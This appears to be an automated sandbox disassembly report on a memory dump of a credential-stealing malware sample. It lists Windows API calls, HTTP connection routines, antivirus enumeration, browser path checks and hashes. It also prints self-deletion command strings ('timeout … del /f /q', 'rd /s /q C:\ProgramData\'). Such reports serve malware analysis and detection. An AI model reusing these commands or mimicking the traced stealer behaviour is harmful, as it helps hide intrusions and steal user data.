                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                                                          • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                          • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                          • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                                                          • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                                                          • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                          • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                                                          • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                          • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                          • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                                                          • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                          • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                          • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                          • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                          • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                          • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                        • String ID: .exe$.exe$_DEBUG.zip$bb7310eab4245006f125c442da2d1e50$cowod.$hopto$http://$org
                                                                                                                                                        • API String ID: 305159127-4208217514
                                                                                                                                                        • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                        • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                                                        • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                        • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                                                        APIs
                                                                                                                                                        • strtok_s.MSVCRT ref: 004135EA
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                                                        • strtok_s.MSVCRT ref: 0041398F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                        • String ID: false$true
                                                                                                                                                        • API String ID: 2116072422-2658103896
                                                                                                                                                        • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                        • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                                                        • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                        • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                        • String ID: GET$\xA
                                                                                                                                                        • API String ID: 442264750-571280152
                                                                                                                                                        • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                        • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                                                        • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                        • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                          • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                                                          • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004012A7
                                                                                                                                                        • _memset.LIBCMT ref: 004012B6
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                          • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                        • String ID:
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00418296
                                                                                                                                                        • _memset.LIBCMT ref: 004182A5
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                                                                        • _memset.LIBCMT ref: 00418465
                                                                                                                                                        • _memset.LIBCMT ref: 00418477
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00418487
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        Strings
                                                                                                                                                        • " & exit, xrefs: 00418389
                                                                                                                                                        • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                                                                        • " & exit, xrefs: 004183DA
                                                                                                                                                        • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                                                                        • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                        • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                        • wsprintfA.USER32 ref: 00410AA7
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                        • String ID: wA$:\$C$QuBi
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                        • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                        • wsprintfA.USER32 ref: 004112DD
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                        • String ID: <+A
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                        • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                        APIs
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                        • String ID: Stable\$ Stable\$firefox
                                                                                                                                                        • API String ID: 3722407311-2697854757
                                                                                                                                                        • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                        • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                                                        • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                        • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                                                        APIs
                                                                                                                                                        • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                          • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                                                          • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                                                          • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                                                                        • String ID: LzA
                                                                                                                                                        • API String ID: 1968765330-1388989900
                                                                                                                                                        • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                        • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                                                        • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                        • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                                                        APIs
